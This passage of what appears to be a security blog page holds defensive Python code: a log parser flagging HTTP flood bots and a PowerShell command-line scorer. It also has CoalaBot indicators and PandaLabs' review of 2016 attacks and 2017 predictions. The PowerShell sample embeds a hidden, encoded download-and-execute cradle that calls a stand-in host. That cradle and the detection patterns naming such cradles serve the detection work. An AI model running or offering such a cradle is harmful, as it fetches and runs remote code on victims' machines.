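    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    rec["base"], _, rec["query"] = rec["path"].partition("?")
    return rec


def flood_sources(lines, rps_threshold=20.0, min_unique_query_ratio=0.9):
    """Return {ip: report} for sources whose request rate over their own
    first-to-last window reaches rps_threshold. The report also says whether
    the query string was unique on (almost) every request, the cache-busting
    pattern a randomizing L7 bot produces."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)
    flagged = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["time"])
        span = max((recs[-1]["time"] - recs[0]["time"]).total_seconds(), 1.0)  # a burst inside one second still counts as one second
        rps = len(recs) / span
        with_query = [r["query"] for r in recs if r["query"]]
        ratio = len(set(with_query)) / len(with_query) if with_query else 0.0
        if rps >= rps_threshold:
            flagged[ip] = {
                "requests": len(recs),
                "rps": round(rps, 1),
                "random_query": ratio >= min_unique_query_ratio,
                "paths": sorted({r["base"] for r in recs}),
            }
    return flagged


def constructed_sample():
    """Constructed log: one bot firing 60 requests in two seconds with a
    changing query string, two ordinary visitors and one unparseable line."""
    bot = [
        f'203.0.113.7 - - [11/Sep/2017:10:00:{i // 30:02d} +0000] '
        f'"GET /index.php?cb={100000 + i * 7919} HTTP/1.1" 200 5120 "-" '
        f'"Mozilla/5.0 (Windows NT 6.1; WOW64)"'
        for i in range(60)
    ]
    visitors = [
        '198.51.100.20 - - [11/Sep/2017:10:00:00 +0000] "GET / HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
        '198.51.100.20 - - [11/Sep/2017:10:00:04 +0000] "GET /style.css HTTP/1.1" 200 1200 "http://example.test/" "Mozilla/5.0"',
        '198.51.100.21 - - [11/Sep/2017:10:00:02 +0000] "GET /index.php?page=2 HTTP/1.1" 200 7000 "-" "Mozilla/5.0"',
        'this line is not an access-log record',
    ]
    return bot + visitors


if __name__ == "__main__":
    for ip, report in flood_sources(constructed_sample()).items():
        print(ip, report)
```

Rate alone is a weak signal (a NAT gateway or a crawler can exceed it); rate combined with a never-repeating query string on one or two dynamic paths is what separates this bot's traffic from a busy legitimate client, and it is also the signal a caching layer or WAF can act on.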


VT link
MD5 f3862c311c67cb027a06d4272b680a3b
SHA1 0ff1584eec4fc5c72439d94e8cee922703c44049
SHA256 fd07ad13dbf9da3f7841bc0dbfd303dc18153ad36259d9c6db127b49fa01d08f

Emerging Threats rules :
2024531 || ET TROJAN MSIL/CoalaBot CnC Activity

Read More:
August in November: New Information Stealer Hits the Scene - 2016-12-07 - Proofpoint

Cyber Security Predictions for 2017



The first quarter of 2016 saw more than 20 million new samples of malware detected and neutralised by PandaLabs, an average of 227,000 per day. This figure is slightly higher than that of 2015, which saw around 225,000 per day.

Over 2016 as a whole, however, the number of new malware samples has been slightly lower than in 2015, about 200,000 new samples per day on average, while attacks have become more effective.

Cybercriminals are becoming more confident in their abilities, and, although figures have been lower than expected, there is still cause for concern. Hackers appear to be concentrating their efforts into the most profitable attacks, utilising sophisticated techniques that allow them to make quick and easy money in an efficient manner.

Black hats have turned their focus essentially to productivity, proliferating attacks on businesses that handle massive quantities of data and sensitive information. Once they have gained access to these businesses, they infect as many computers as possible with ransomware, putting themselves in a position to demand millions in ransom or put the data up for sale on the black market.

If there is one thing that hasn't changed over the course of this year, it's the popularity of Trojans, with ransomware at the forefront, as they continue to top the statistical charts year after year.

Ranking the top attacks of 2016



We know that ransomware is a substantial business for cybercriminals, but it is incredibly tricky to measure the number of attacks reliably. What can be noted is the evolution of ransomware attacks, which in some cases have become particularly aggressive, as with Petya. Instead of encrypting documents, Petya goes straight for the computer's Master Boot Record (MBR) and renders the system unbootable until a ransom is paid.

Abuse of the system tool PowerShell has risen this year. Installed by default on modern Windows, including Windows 10, it is frequently used in attacks to avoid detection by the security solutions installed on victims' computers.
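PowerShell abuse is usually caught from process command lines rather than from files, because the payload never touches disk. The following is an added example, not from the PandaLabs report: it decodes `-EncodedCommand` payloads (base64 of UTF-16LE, which is how powershell.exe expects them) and scores each command line for the switches and download cradles that make PowerShell attractive for staying out of sight. The indicator patterns, the scoring threshold and the sample command lines are constructed for illustration, not a vendor rule set.

```python
"""Score PowerShell command lines for attacker tradecraft. Added example;
indicator patterns and sample command lines are constructed."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of a switch, so -e, -enc and
# -EncodedCommand are all the same thing; -ec is an explicit alias.
SWITCH_RE = re.compile(r"(?:^|\s)-(\w+)\s+(\S+)")

INDICATORS = {
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "no_profile": re.compile(r"(?i)-no(?:p|profile)\b"),
    "bypass_policy": re.compile(r"(?i)-ex\w*\s+bypass"),
    "download_cradle": re.compile(
        r"(?i)(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer)"),
    "invoke_expression": re.compile(r"(?i)\b(iex|Invoke-Expression)\b"),
}


def extract_encoded(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none
    or it does not decode as base64(UTF-16LE)."""
    for switch, value in SWITCH_RE.findall(cmdline):
        s = switch.lower()
        if s == "ec" or (s.startswith("e") and "encodedcommand".startswith(s)):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze(cmdline):
    """Return (score, findings, decoded_script). Indicators are matched
    against both the raw command line and the decoded payload, so a cradle
    hidden inside -enc still counts."""
    decoded = extract_encoded(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    findings = ["encoded_command"] if decoded is not None else []
    findings += [name for name, rx in INDICATORS.items() if rx.search(text)]
    return len(findings), findings, decoded


def triage(cmdlines, threshold=3):
    """Keep only the command lines whose indicator count reaches threshold."""
    kept = []
    for c in cmdlines:
        score, findings, _ = analyze(c)
        if score >= threshold:
            kept.append((c, findings))
    return kept


def encode_ps(script):
    """Produce the -EncodedCommand form, as an attacker or admin would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: a classic download-and-execute cradle, an admin
# running a local script with a policy bypass, and benign interactive use.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
SAMPLES = [
    f"powershell.exe -nop -w hidden -enc {encode_ps(CRADLE)}",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe Get-Process | Sort-Object CPU -Descending",
]

if __name__ == "__main__":
    for cmd, findings in triage(SAMPLES):
        print(findings, "<-", cmd[:60], "...")
```

A single switch such as `-ExecutionPolicy Bypass` is routine in administration and scores low on its own; the combination of a hidden window, no profile, an encoded payload and a network download inside it is what pushes a command line over the threshold.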

In Q2 of 2016, one of the strangest ransomware cases involved a company in Slovenia. The company's head of security received an email from Russia informing him that their network had been compromised and that the attackers were poised to launch ransomware on all of the company's computers if it did not pay around €9,000 in bitcoin within 3 days. To prove that they did in fact have access to the organisation's network, the hackers sent a file listing every device connected to the company's internal network.

Ransomware as a Service (RaaS) emerged as the latest development in the ransomware industry. In Q3 we witnessed a higher level of specialisation in the ransomware trade. The best example featured the creators of the Petya and Mischa ransomware, who specialised in developing the malware and its corresponding payment platform while leaving distribution in the hands of third parties. Once the creators have done their part, the distributors take charge of infecting victims. Much as in the legitimate world, the distributors' profit is a percentage of the money acquired: the higher the sales, the higher the percentage they receive.

Malicious email

Attacks don’t only come in the form of malvertising or compromised websites. A large number of them still arrive through email in the form of false invoices or other notifications. An attack of this sort was carried out in at least two European countries, in which cybercriminals posed as their respective local electricity supply companies. The message contained no attachment, showing only the billing information in text and including a link that when clicked would take you to the invoice details. The hook was an exorbitantly high payment that would entice an emotional response so that the recipient would click through to consult the supposed bill without thinking. Upon clicking the link, the user was directed to a website that resembled the company’s real website, where a bill could be downloaded. If the client downloaded and opened the file, they became infected with ransomware.

Business Email Compromise Phishing

Hackers investigate how the company operates from the inside and gather information about their victims from social networks to lend credibility to the con. The attackers then pose as the CEO or financial director of the company and request a transfer from an employee. This kind of attack is rapidly gaining in popularity.

A notable case this year affected Mattel, the well-known manufacturer of Barbie and Hot Wheels toys. A high-ranking executive received a message purporting to come from the recently appointed CEO, requesting a transfer of $3 million to a bank account in China. After making the transfer, the executive confirmed with the CEO that it was done; the CEO was baffled, having given no such order. They contacted the American authorities and the bank, but it was too late: the money had already been transferred.

In this case they were fortunate. It was a bank holiday in China and there was enough time to alert the Chinese authorities. The account was frozen, and Mattel was able to recover their money.


Mobile Devices

SNAP was one of the most talked-about vulnerabilities we saw this year, affecting LG G3 phones. The problem stemmed from a flaw in LG's notifications app, Smart Notice, which allowed arbitrary JavaScript to run. Researchers at BugSec discovered the vulnerability and notified LG, which rapidly published an update that resolved the problem.

Gugi, an Android Trojan, managed to bypass Android 6's security barriers to steal banking credentials from apps installed on the phone. To accomplish this, Gugi overlaid its own screen on top of the legitimate app's, asking for information that was then sent directly to the criminals without the victims' knowledge.

In August, Apple published an urgent update, iOS 9.3.5. This version resolves three zero-day vulnerabilities exploited by spyware known as Pegasus, developed by the NSO Group, an Israeli organization with products similar to those offered by Hacking Team.

Internet of Things

Connected cars are at risk from cyber-attack. Researchers at the University of Birmingham showed how they had succeeded in compromising the remote keyless entry system of every vehicle sold by the Volkswagen Group in the last twenty years. Researchers Charlie Miller and Chris Valasek, who last year demonstrated how to hack a Jeep Cherokee, took it one step further this year, showing how they could manipulate the throttle, the brakes and even the steering wheel at will while the car was in gear.

Smart homes are just as vulnerable to attack. Researchers Andrew Tierney and Ken Munro demonstrated a proof of concept for hijacking a thermostat. After taking control of the thermostat (by inserting an SD card into it), they raised the temperature to 99 degrees Fahrenheit and required a PIN to deactivate it. The thermostat connected to an IRC channel, using the MAC address as an identifier for every compromised device. It demanded a bitcoin in exchange for the PIN, which changed every 30 seconds.



2016 saw the United States go on the offensive and concede that it is launching cyber-attacks against Daesh targets. Robert Work, United States Deputy Secretary of Defense, made this clear in statements to CNN.

In February, South Korean officials discovered an attack originating from North Korea. The attack allegedly began over a year earlier, its primary target being 140,000 computers belonging to organisations and government agencies, as well as defense contractors. According to police statements, more than 42,000 documents were stolen, 95% of which were defense-related, such as documents containing plans and specifications for the F-15 fighter jet.

At the height of the United States presidential election, one of the most significant incidents that took place was the discovery of an attack on the DNC (Democratic National Committee) in which a stockpile of data was plundered, and was then leaked to the public.

On the subject of the elections, the FBI issued an alert after detecting two attacks on electoral websites, and at least one of the attackers — identified as foreigners — was able to make off with voter registration data.

In August, a group calling itself “The Shadow Brokers” announced that it had hacked the NSA and published some of the “cyber weapons” that it had stolen, promising to sell the rest to the highest bidder.


In June, a criminal dubbed “The Dark Overlord” put patient information from three US institutions up for sale on the black market. He had stolen information from over 650,000 patients and asked for around $700,000 for its return. Shortly thereafter, he put the personal information of 9.3 million clients of a medical insurance agency up for sale for 750 bitcoins.

In the last few months, Dropbox became another victim of cybercrime. It was recently revealed that the well-known file sharing service suffered an attack in 2012. The outcome: the theft of data from 68 million users.

One of the biggest attacks to date affected Yahoo: despite having taken place in 2014, the attack only became known recently. A total of 500 million accounts were compromised, making it the greatest theft of its kind to date.

In August 2016 we saw one of the greatest bitcoin thefts in history. Bitfinex, a company that deals in the commerce and exchange of cryptocurrency, was compromised and had an equivalent of 60 million dollars in bitcoins stolen from it, money which belonged to clients that had deposited their bitcoins in this “bank”. There is still no evidence pointing to the culprits, and the company has offered no information as to how it happened, as law enforcement agencies are still investigating the case.

DDoS Attacks

In September, Brian Krebs, the well-known security journalist, blew the cover off vDOS, a "business" that offered DDoS attack services. Shortly thereafter, the people responsible, who in two years had launched 150,000 attacks and made a profit of $618,000, were arrested.

In retaliation hackers took down Krebs’s website through a crippling DDoS attack. In the end, Google, through its Project Shield, was able to protect it and the page came back online.

In the last quarter of the year, a wave of large-scale cyberattacks against the American DNS provider Dyn disrupted the websites of some major global corporations. The attack affected major organisations and international communications tools such as Netflix, Twitter, Amazon and The New York Times. Service was interrupted for almost 11 hours, affecting more than a billion clients worldwide.


POS’s and Credit Cards

The popular American fast-food chain Wendy's saw the point-of-sale terminals at more than 1,000 of its restaurants infected with malware that stole customers' credit card information. PandaLabs discovered an attack carried out with malware known as PunkeyPOS, which was used to infect more than 200 US restaurants.

Another such attack was discovered in 2016 by PandaLabs. Once again, the victims were US restaurants, a total of 300 establishments whose POS terminals had been infected with the PosCardStealer malware.

Financial Institutions

This year, the Central Bank of Bangladesh suffered an attack in which bank transfers totalling 1 billion US dollars were attempted. Fortunately, a large portion of those transfers were blocked, although the thieves still succeeded in making off with 81 million dollars.

Shortly after that we witnessed two similar cases: one against a bank in Vietnam, another against a bank in Ecuador.


Social Networks

The security of 117 million LinkedIn users was at risk after a list of email addresses and their respective passwords was published.

On Twitter, 32 million usernames and passwords were put up for sale for around $6,000. The social network denied that the account information had been acquired from its servers. In fact, the passwords were in plain text and the majority of them belonged to Russian users, hinting at the possibility that they were obtained by means of phishing or Trojans.

This year it came to light that MySpace had been attacked. The intrusion happened in 2013, although up until May of this year it remained unknown. Usernames, passwords and email addresses were taken, affecting up to 360 million accounts. A user may not have used MySpace in years, but if they are in the habit of reusing passwords and aren't using two-factor authentication, they could be at risk.

Activating two-factor authentication, creating complex passwords and not reusing them for different websites is recommended to avoid these risks.

What cyber nightmares does 2017 have in store for us?


Having taken center stage in 2016, Ransomware will most likely do so again in 2017. In some ways, this kind of attack is cannibalising other more traditional ones that are based on information theft. Ransomware is a simpler and more direct way to make a profit, eliminating intermediaries and unnecessary risks.

Taking every idea into consideration


Attacks on companies will be more numerous and sophisticated. Companies are already the prime target of cybercriminals. Their information is more valuable than that of private users.

Cybercriminals are always on the lookout for weaknesses in corporate networks through which they can gain access. Once inside, they use lateral movements to access resources that contain the information they are looking for. They can also launch large-scale ransomware attacks (infecting with ransomware all available devices), in order to demand astronomical sums of money to recover the data of affected companies.

Internet of Things

Internet of Things (IoT) is fast becoming the next cybersecurity nightmare. Any kind of device connected to a network can be used as an entryway into corporate and home networks. The majority of these devices have not been designed with security strength in mind. Typically they do not receive automatic security updates, use weak passwords, reuse the same credentials in thousands of devices, and other security flaws – all of this together makes them extremely vulnerable to outside attacks.


The final months of 2016 witnessed the most powerful DDoS attacks in history. It began in September with an attack on Brian Krebs after he reported on the activities of an Israeli company that offered this kind of service. On the heels of that attack came another on the French hosting company OVH (reaching 1 Tbps of traffic) and another on the American company Dyn that left several major tech giants without Internet service.

These attacks were carried out by bot networks that relied on thousands of affected IoT devices (IP cameras, routers). We can be certain that 2017 will see an increase in this kind of attack, which is typically used to blackmail companies or to harm their business.

Mobile Phones

The target is clear here as well: Android devices got the worst of it, which makes sense given that Android has the greatest market share. Focusing on a single OS makes it easier for cybercriminals to fix a target with maximal dissemination and profitability.

To complicate matters, updates do not depend only on Google releasing them for Android, but also on each hardware manufacturer's decision of when and how to incorporate them, if at all. Given the number of security issues that crop up every month, this situation only puts users at greater risk.


We are living in uncertain times with regards to international relations: threats of trade wars, espionage and tariffs with the potential to polarise the positions of the great powers. This can no doubt have vast and serious consequences in the field of cyber-security.

Governments will want access to more information, at a time when encryption is becoming more popular, and intelligence agencies will become more interested in obtaining information that could benefit industry in their countries.

A global situation of this kind could hamper data sharing initiatives — data that large companies are already sharing in order to better protect themselves against cyber-crime, setting standards and international engagement protocols.


Cybercrime Surges in Q3


PandaLabs Q3 Report indicates that incidences of cybercrime continue to increase, with 18 million new malware samples captured this quarter – more than 200,000 samples daily.

The Quarter at a Glance

Cybercrime continues to grow at an exponential rate, fuelled by the opportunity for large financial rewards.

Hackers have taken to developing new variants of successful ransomware such as Locky, and a model known as Ransomware-as-a-Service (RaaS) has emerged, whereby developers create ransomware for distributors, who then target and infect victims, allowing both parties to achieve greater profits.

Another key development was the occurrence of DDoS attacks, most notably the one on cyber security journalist Brian Krebs. Krebs's exposure of vDOS led to the arrest of its key members and subsequently made his site the target of a massive DDoS attack that saw Google step in to restore it. In one of the largest attacks of its kind, the attackers leveraged IoT devices to send 620 Gbps of traffic to the site at its peak.
This quarter, cyber-attacks targeted multiple gaming sites, gaining access to millions of users' personal information. These attacks were largely launched using botnets composed of smartphones, and affected users of Overwatch, World of Warcraft and Diablo 3. Further attacks saw more than 3.5 million users exposed when Dota 2 and the mobile game Clash of the Kings were targeted. These are just a few of the incidents in the gaming world in the last 3 months.

The banking sector remained a target for hackers as attacks on ATMs, POS terminals and bitcoin wallets continue to become more frequent and more advanced.

A Taiwanese ATM attack this quarter indicated just how advanced cybercriminals have become: they were able to breach the bank's internal network and withdraw over R28 million without even touching the ATMs themselves.

Another big victim was Yahoo: one of the biggest breaches of its kind, revealed this quarter, showed that 500 million user accounts had been compromised in a 2014 attack.

Finally, Q3 saw the largest bitcoin robbery to date, when around 60 million dollars' worth of bitcoin was stolen by hackers from the exchange Bitfinex.

View the full PandaLabs Q3 Report for more detail on specific attacks and find out how you can protect yourself and your business from the advanc
